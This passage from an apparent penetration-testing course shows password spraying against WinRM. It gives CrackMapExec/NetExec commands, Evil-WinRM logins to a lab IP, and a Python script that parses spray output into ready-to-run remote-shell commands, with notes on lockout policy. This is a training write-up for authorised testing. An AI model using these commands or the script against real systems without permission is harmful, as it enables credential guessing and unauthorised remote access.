A handy tool that we can use for our password attacks is CrackMapExec (CME), which can also be used against other protocols such as SMB, LDAP, MSSQL, and others, not only WinRM.
We recommend reading the official documentation for this tool to become familiar with it.
sudo apt-get -y install crackmapexec

CrackMapExec is no longer maintained; NetExec (nxc) is its actively maintained successor and accepts the same command syntax, so we can install it instead to follow along:

sudo apt-get -y install netexec
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>

For example, to test the users in user.list with the passwords in password.list against the WinRM service (with NetExec, replace crackmapexec with nxc):

crackmapexec winrm 10.129.42.197 -u user.list -p password.list

When both -u and -p point to files, every user is tried against every password, so the number of attempts is users × passwords. Check the target's account lockout policy before spraying and consider trying only one or two passwords per run; --no-bruteforce pairs the two files line by line instead (user1 with password1, user2 with password2), and --continue-on-success keeps testing after the first valid login instead of stopping there.
Another handy tool for the WinRM service is Evil-WinRM, a Ruby-based client that gives us an interactive PowerShell session over WinRM once we have valid credentials.
sudo gem install evil-winrm

evil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i 10.129.42.197 -u user -p password
If the login was successful, a terminal session is initialized using the PowerShell Remoting Protocol (MS-PSRP), which simplifies the operation and execution of commands. Note that by default only members of the local Administrators group and of the Remote Management Users group are allowed to connect over WinRM, so a password that is valid for SMB may still be rejected here.
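A spray with user and password lists produces one output line per attempt, and the useful ones are easy to lose in the noise. The following Python script is an added example, not code from this module or from the CrackMapExec/NetExec or Evil-WinRM projects: it parses CME/NetExec-style output, keeps the deduplicated [+] logins (flagging the ones marked Pwn3d!), counts attempts per user so the total can be compared with the lockout threshold, and turns each valid credential into the evil-winrm command shown above. The sample output is constructed to match the tool's column layout (protocol, IP, port, hostname, status, message); the hostname WINSRV, the domain and the passwords are made up.

```python
import re
import shlex
from collections import Counter
from dataclasses import dataclass

# Constructed sample of CrackMapExec/NetExec "winrm" spray output (not a real
# capture): [*] is a host-info line, [-] a failed login, [+] a valid login.
SAMPLE_OUTPUT = """\
WINRM       10.129.42.197   5985   WINSRV           [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM       10.129.42.197   5985   WINSRV           [-] WINSRV\\user:admin123
WINRM       10.129.42.197   5985   WINSRV           [+] WINSRV\\user:password (Pwn3d!)
WINRM       10.129.42.197   5985   WINSRV           [-] WINSRV\\john:password
WINRM       10.129.42.197   5985   WINSRV           [+] WINSRV\\john:Winter2023
WINRM       10.129.42.197   5985   WINSRV           [+] WINSRV\\user:password (Pwn3d!)
"""

# Column layout assumed here: PROTO  IP  PORT  HOSTNAME  [status] message
LINE_RE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[(?P<status>[-+*])\]\s+(?P<msg>.*)$"
)
# Login-attempt message: DOMAIN\user:password, optionally followed by "(Pwn3d!)".
# The password is matched lazily so a password containing spaces still works.
CRED_RE = re.compile(
    r"^(?:(?P<domain>[^\\]+)\\)?(?P<user>[^:]+):(?P<password>.*?)"
    r"(?P<pwned>\s\(Pwn3d!\))?$"
)


@dataclass(frozen=True)
class Credential:
    proto: str
    ip: str
    port: int
    domain: str
    user: str
    password: str
    pwned: bool  # line carried the "(Pwn3d!)" marker


def _login_lines(text):
    """Yield (status, Credential) for every [+]/[-] login line in the output."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw.rstrip())
        if not m or m["status"] == "*":
            continue  # banner / host-info line, not a login attempt
        c = CRED_RE.match(m["msg"])
        if not c:
            continue
        yield m["status"], Credential(
            proto=m["proto"].lower(), ip=m["ip"], port=int(m["port"]),
            domain=c["domain"] or "", user=c["user"], password=c["password"],
            pwned=c["pwned"] is not None,
        )


def parse_output(text):
    """Return the valid ([+]) credentials in order of first appearance, deduplicated."""
    seen, valid = set(), []
    for status, cred in _login_lines(text):
        if status == "+" and cred not in seen:
            seen.add(cred)
            valid.append(cred)
    return valid


def attempts_per_user(text):
    """Count login attempts per user (failed and successful) to compare with the lockout threshold."""
    return Counter(cred.user for _status, cred in _login_lines(text))


def evil_winrm_command(cred):
    """Build the Evil-WinRM login command for a valid credential, shell-quoting every value."""
    return "evil-winrm -i {} -u {} -p {}".format(
        shlex.quote(cred.ip), shlex.quote(cred.user), shlex.quote(cred.password)
    )


if __name__ == "__main__":
    for cred in parse_output(SAMPLE_OUTPUT):
        print(("pwned " if cred.pwned else "valid ") + evil_winrm_command(cred))
    for user, n in attempts_per_user(SAMPLE_OUTPUT).items():
        print(f"{user}: {n} attempts")
```

Pipe real output into parse_output (for example by reading the log file crackmapexec or nxc wrote) and the script prints one ready-to-run evil-winrm line per valid account; the per-user attempt counts are worth checking against the lockout threshold before launching the next password round.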
Secure Shell (SSH) is an encrypted way to connect to a remote host to execute system commands or transfer files from a host to a server. The SSH server listens on TCP port 22 by default, and the protocol combines three cryptographic building blocks: symmetric encryption, asymmetric encryption, and hashing.